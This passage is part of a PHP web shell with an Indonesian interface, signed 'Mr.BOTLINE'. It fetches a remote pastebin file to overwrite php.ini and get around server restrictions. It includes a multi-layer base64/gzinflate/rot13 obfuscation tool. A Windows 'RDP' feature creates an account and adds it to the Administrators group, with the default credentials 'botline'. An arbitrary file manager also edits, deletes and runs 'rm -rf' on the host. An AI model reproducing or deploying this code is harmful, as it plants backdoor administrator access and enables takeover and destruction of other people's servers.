1940. </html>
1941. <?php
1942.  
1943. }
1944. function parah($pastebin, $nama_file){
1945.     $usa = file_get_contents("$pastebin");
1946.     $frr = fopen("$nama_file", 'w');
1947.     fwrite($frr, $usa);
1948. }
1949. $xp = @$_GET['xp'];
1950. if($xp == "bypassmod"){
1951.             $config = parah("https://pastebin.com/raw/3cjv499Y", "php.ini");
1952.        echo '<center><font color =red><a href="php.ini" target="_blank">Cek Disini Sayang :*</a><br></font></center>';
1953. } elseif($_GET['do'] == 'endec') {
1954. $text = $_POST['code'];
1955. echo "<center>
1956. <form method='post'><br>
1957. <textarea placeholder='MASUKIN TEXT YANG MAU DI ENCRYPT/DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
1958. <select class='inputz' size='1' name='ope'>
1959. <option value='urlencode'>url</option>
1960. <option value='json'>json</option>
1961. <option value='ur'>convert_uu</option>
1962. <option value='base64'>Base64</option>
1963. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
1964. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
1965. <option value='coeg'>gzinflate - base64</option>
1966. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
1967. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
1968. <option value='str2'>str_rot13 - base64</option>
1969. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
1970. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
1971. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 -  base64</option>
1972. <option value='gzpress'>gzcompress - base64</option>
1973. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
1974. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
1975. </form>";
1976. $submit = $_POST['submit'];
1977. if (isset($submit)){
1978. $op = $_POST["ope"];
1979. switch ($op) {case 'base64': $codi=base64_encode($text);
1980. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
1981. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
1982. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
1983. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
1984. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
1985. break;case 'urlencode' : $codi=rawurlencode($text);
1986. break;case 'ur' : $codi=convert_uuencode($text);
1987. break;case 'json' : $codi=json_encode(utf8_encode($text));
1988. break;case 'str2' : $codi=base64_encode(str_rot13($text));
1989. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
1990. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
1991. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
1992. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
1993. break;default:break;}}
1994. $submit = $_POST['submits'];
1995. if (isset($submit)){
1996. $op = $_POST["ope"];
1997. switch ($op) {case 'base64': $codi=base64_decode($text);
1998. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1999. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
2000. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
2001. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
2002. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
2003. break;case 'urlencode' : $codi=rawurldecode($text);
2004. break;case 'ur' : $codi=convert_uudecode($text);
2005. break;case 'json' : $codi=utf8_decode(json_decode($text));
2006. break;case 'str2' : $codi=str_rot13(base64_decode($text));
2007. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
2008. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
2009. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
2010. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
2011. break;default:break;}}
2012. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
2013. fwrite($myfile, $codi);
2014. fclose($myfile);
2015. echo "<center><div id='kotakan'><br>
2016. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
2017. } elseif($_GET['do'] == 'krdp_shell') {
2018.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2019.         if($_POST['create']) {
2020.             $user = htmlspecialchars($_POST['user']);
2021.             $pass = htmlspecialchars($_POST['pass']);
2022.             if(preg_match("/$user/", exe("net user"))) {
2023.                 echo "[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font>";
2024.             } else {
2025.                 $add_user   = exe("net user $user $pass /add");
2026.                 $add_groups1 = exe("net localgroup Administrators $user /add");
2027.                 $add_groups2 = exe("net localgroup Administrator $user /add");
2028.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
2029.                 echo "[ RDP ACCOUNT INFO ]<br>
2030.                 ------------------------------<br>
2031.                 IP: <font color=white>".$ip."</font><br>
2032.                 Username: <font color=white>$user</font><br>
2033.                 Password: <font color=white>$pass</font><br>
2034.                 ------------------------------<br><br>
2035.                 [ STATUS ]<br>
2036.                 ------------------------------<br>
2037.                 ";
2038.                 if($add_user) {
2039.                     echo "[add user] -> <font color='white'>Berhasil</font><br>";
2040.                 } else {
2041.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
2042.                 }
2043.                 if($add_groups1) {
2044.                     echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
2045.                 } elseif($add_groups2) {
2046.                     echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
2047.                 } elseif($add_groups3) {
2048.                     echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
2049.                 } else {
2050.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2051.                 }
2052.                 echo "------------------------------<br>";
2053.             }
2054.         } elseif($_POST['s_opsi']) {
2055.             $user = htmlspecialchars($_POST['r_user']);
2056.             if($_POST['opsi'] == '1') {
2057.                 $cek = exe("net user $user");
2058.                 echo "Checking username <font color=white>$user</font> ....... ";
2059.                 if(preg_match("/$user/", $cek)) {
2060.                     echo "[ <font color=white>Sudah ada</font> ]<br>
2061.                     ------------------------------<br><br>
2062.                     <pre>$cek</pre>";
2063.                 } else {
2064.                     echo "[ <font color=red>belum ada</font> ]";
2065.                 }
2066.             } elseif($_POST['opsi'] == '2') {
2067.                 $cek = exe("net user $user botline");
2068.                 if(preg_match("/$user/", exe("net user"))) {
2069.                     echo "[change password: <font color=red>botline</font>] -> ";
2070.                     if($cek) {
2071.                         echo "<font color=white>Berhasil</font>";
2072.                     } else {
2073.                         echo "<font color=red>Gagal</font>";
2074.                     }
2075.                 } else {
2076.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
2077.                 }
2078.             } elseif($_POST['opsi'] == '3') {
2079.                 $cek = exe("net user $user /DELETE");
2080.                 if(preg_match("/$user/", exe("net user"))) {
2081.                     echo "[remove user: <font color=white>$user</font>] -> ";
2082.                     if($cek) {
2083.                         echo "<font color=white>Berhasil</font>";
2084.                     } else {
2085.                         echo "<font color=red>Gagal</font>";
2086.                     }
2087.                 } else {
2088.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font>";
2089.                 }
2090.             } else {
2091.                 //
2092.             }
2093.         } else {
2094.             echo "-- Create RDP --<br>
2095.             <form method='post'>
2096.             <input type='text' name='user' placeholder='username' value='botline' required>
2097.             <input type='text' name='pass' placeholder='password' value='botline' required>
2098.             <input type='submit' name='create' value='>>'>
2099.             </form>
2100.             -- Option --<br>
2101.             <form method='post'>
2102.             <input type='text' name='r_user' placeholder='username' required>
2103.             <select name='opsi'>
2104.             <option value='1'>Cek Username</option>
2105.             <option value='2'>Ubah Password</option>
2106.             <option value='3'>Hapus Username</option>
2107.             </select>
2108.             <input type='submit' name='s_opsi' value='>>'>
2109.             </form>
2110.             ";
2111.         }
2112.     } else {
2113.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2114.     }
2115.        
2116.     }elseif($_GET['act'] == 'newfile') {
2117.     if($_POST['new_save_file']) {
2118.         $newfile = htmlspecialchars($_POST['newfile']);
2119.         $fopen = fopen($newfile, "a+");
2120.         if($fopen) {
2121.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2122.         } else {
2123.             $act = "<font color=red>permission denied</font>";
2124.         }
2125.     }
2126.     echo $act;
2127.     echo "<form method='post'>
2128.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2129.     <input type='submit' name='new_save_file' value='Submit'>
2130.     </form>";
2131. } elseif($_GET['act'] == 'newfolder') {
2132.     if($_POST['new_save_folder']) {
2133.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2134.         if(!mkdir($new_folder)) {
2135.             $act = "<font color=red>permission denied</font>";
2136.         } else {
2137.             $act = "<script>window.location='?dir=".$dir."';</script>";
2138.         }
2139.     }
2140.     echo $act;
2141.     echo "<form method='post'>
2142.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2143.     <input type='submit' name='new_save_folder' value='Submit'>
2144.     </form>";
2145. } elseif($_GET['act'] == 'rename_dir') {
2146.     if($_POST['dir_rename']) {
2147.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2148.         if($dir_rename) {
2149.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2150.         } else {
2151.             $act = "<font color=red>permission denied</font>";
2152.         }
2153.     echo "".$act."<br>";
2154.     }
2155.     echo "<form method='post'>
2156.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2157.     <input type='submit' name='dir_rename' value='rename'>
2158.     </form>";
2159. } elseif($_GET['act'] == 'delete_dir') {
2160.     if(is_dir($dir)) {
2161.         if(is_writable($dir)) {
2162.             @rmdir($dir);
2163.             @exe("rm -rf $dir");
2164.             @exe("rmdir /s /q $dir");
2165.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2166.         } else {
2167.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
2168.         }
2169.     }
2170.     echo $act;
2171. } elseif($_GET['act'] == 'view') {
2172.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2173.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2174. } elseif($_GET['act'] == 'edit') {
2175.     if($_POST['save']) {
2176.         $save = file_put_contents($_GET['file'], $_POST['src']);
2177.         if($save) {
2178.             $act = "<font color=white>Saved!</font>";
2179.         } else {
2180.             $act = "<font color=red>permission denied</font>";
2181.         }
2182.     echo "".$act."<br>";
2183.     }
2184.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2185.     echo "<form method='post'>
2186.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2187.     <input type='submit' value='Save' name='save' style='width: 500px;'>
2188.     </form>";
2189. } elseif($_GET['act'] == 'rename') {
2190.     if($_POST['do_rename']) {
2191.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2192.         if($rename) {
2193.             $act = "<script>window.location='?dir=".$dir."';</script>";
2194.         } else {
2195.             $act = "<font color=red>permission denied</font>";
2196.         }
2197.     echo "".$act."<br>";
2198.     }
2199.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2200.     echo "<form method='post'>
2201.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2202.     <input type='submit' name='do_rename' value='rename'>
2203.     </form>";
2204. } elseif($_GET['act'] == 'delete') {
2205.     $delete = unlink($_GET['file']);
2206.     if($delete) {
2207.         $act = "<script>window.location='?dir=".$dir."';</script>";
2208.     } else {
2209.         $act = "<font color=red>permission denied</font>";
2210.     }
2211.     echo $act;
2212. } else {
2213.     if(is_dir($dir) === true) {
2214.         if(!is_readable($dir)) {
2215.             echo "<font color=red>can't open directory. ( not readable )</font>";
2216.         } else {
2217.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2218.             <tr>
2219.             <th class="th_home"><center>Name</center></th>
2220.             <th class="th_home"><center>Type</center></th>
2221.             <th class="th_home"><center>Size</center></th>
2222.             <th class="th_home"><center>Last Modified</center></th>
2223.             <th class="th_home"><center>Owner/Group</center></th>
2224.             <th class="th_home"><center>Permission</center></th>
2225.             <th class="th_home"><center>Action</center></th>
2226.             </tr>';
2227.             $scandir = scandir($dir);
2228.             foreach($scandir as $dirx) {
2229.                 $dtype = filetype("$dir/$dirx");
2230.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2231.                 if(function_exists('posix_getpwuid')) {
2232.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2233.                     $downer = $downer['name'];
2234.                 } else {
2235.                     //$downer = $uid;
2236.                     $downer = fileowner("$dir/$dirx");
2237.                 }
2238.                 if(function_exists('posix_getgrgid')) {
2239.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2240.                     $dgrp = $dgrp['name'];
2241.                 } else {
2242.                     $dgrp = filegroup("$dir/$dirx");
2243.                 }
2244.                 if(!is_dir("$dir/$dirx")) continue;
2245.                 if($dirx === '..') {
2246.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2247.                 } elseif($dirx === '.') {
2248.                     $href = "<a href='?dir=$dir'>$dirx</a>";
2249.                 } else {
2250.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2251.                 }
2252.                 if($dirx === '.' || $dirx === '..') {
2253.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2254.                     } else {
2255.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2256.                 }
2257.                 echo "<tr>";
2258.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2259.                 echo "<td class='td_home'><center>$dtype</center></td>";
2260.                 echo "<td class='td_home'><center>-</center></th></td>";
2261.                 echo "<td class='td_home'><center>$dtime</center></td>";
2262.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2263.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2264.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2265.                 echo "</tr>";
2266.             }
2267.         }
2268.     } else {
2269.         echo "<font color=red>can't open directory.</font>";
2270.     }
2271.         foreach($scandir as $file) {
2272.             $ftype = filetype("$dir/$file");
2273.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2274.             $size = filesize("$dir/$file")/1024;
2275.             $size = round($size,3);
2276.             if(function_exists('posix_getpwuid')) {
2277.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2278.                 $fowner = $fowner['name'];
2279.             } else {
2280.                 //$downer = $uid;
2281.                 $fowner = fileowner("$dir/$file");
2282.             }
2283.             if(function_exists('posix_getgrgid')) {
2284.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2285.                 $fgrp = $fgrp['name'];
2286.             } else {
2287.                 $fgrp = filegroup("$dir/$file");
2288.             }
2289.             if($size > 1024) {
2290.                 $size = round($size/1024,2). 'MB';
2291.             } else {
2292.                 $size = $size. 'KB';
2293.             }
2294.             if(!is_file("$dir/$file")) continue;
2295.             echo "<tr>";
2296.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2297.             echo "<td class='td_home'><center>$ftype</center></td>";
2298.             echo "<td class='td_home'><center>$size</center></td>";
2299.             echo "<td class='td_home'><center>$ftime</center></td>";
2300.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2301.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2302.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2303.             echo "</tr>";
2304.         }
2305.         echo "</table>";
2306.         if(!is_readable($dir)) {
2307.             //
2308.         } else {
2309.             echo "<hr>";
2310.         }
2311.     echo "<center>Recoded ".date("Y")." - <a href='#' target='_blank'><font color=red>By Mr.BOTLINE</font></a></center>";
2312. }
2313. ?>
2314. </html>